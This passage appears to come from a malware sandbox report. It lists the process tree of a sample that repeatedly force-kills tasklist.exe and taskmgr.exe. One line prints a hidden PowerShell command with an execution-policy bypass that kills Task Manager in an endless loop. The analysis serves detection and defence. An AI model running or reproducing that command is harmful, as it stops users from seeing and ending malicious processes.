    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2560
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3676
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1164
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3272
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4028
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4224
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2572
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4200
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1780
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2576
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4040
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3548
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:876
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:396
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1296
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1240
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2656
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2920
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4812
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3156
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2656
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3832
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3100
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4116
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2572
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4412
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4784
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3996
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1856
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1644
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4684
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2560
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        Kills process with taskkill
        
        PID:4592
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1492
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2824
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3832
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2240
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:544
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1516
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1556
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:404
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4040
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4768
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1508
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4968
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2920
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2076
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3220
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:5112
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2364
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4928
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2920
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3580
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4496
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1932
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4660
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:628
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1844
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4412
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2240
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4996
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4316
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3700
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4996
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1860
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1644
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2824
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4592
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2828
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3544
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4860
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2864
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4684
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1144
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4180
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4480
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1508
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4956
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4636
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4836
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3588
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2572
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1296
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3100
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3220
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3452
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1364
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "while($true){ taskkill /f /im taskmgr.exe}"
      4⤵
      PID:3340
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4012
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3696
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3004
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3984
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4660
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2560
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4572
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4012
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1240
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1296
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1664
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1856
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1556
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2916
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3868
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4412
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:396
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3376
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4492
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2868
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2560
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3376
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4812
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3984
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4436
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3700
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3004
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4436
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4860
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4364
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2676
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3868
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2276
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1536
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2828
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3172
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1608
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:628
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2140
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4504
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3184
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1664
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4528
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4820
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2336
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3224
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4028
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4316
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4116
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2496
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2328
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1108
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4524
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3552
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2420
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4296
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4452
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1332
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3944
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1716
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:880
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4200
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4444
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1728
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4012
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3832
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:396
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3944
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4956
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:880
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1556
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2828
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4952
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2304
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2076
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4192
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3580
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3012
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3832
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4636
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3184
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4116
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2364
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3524
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1492
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2668
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4696
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4324
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2664
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2240
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3184
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4768
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        Kills process with taskkill
        
        PID:4272
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1516
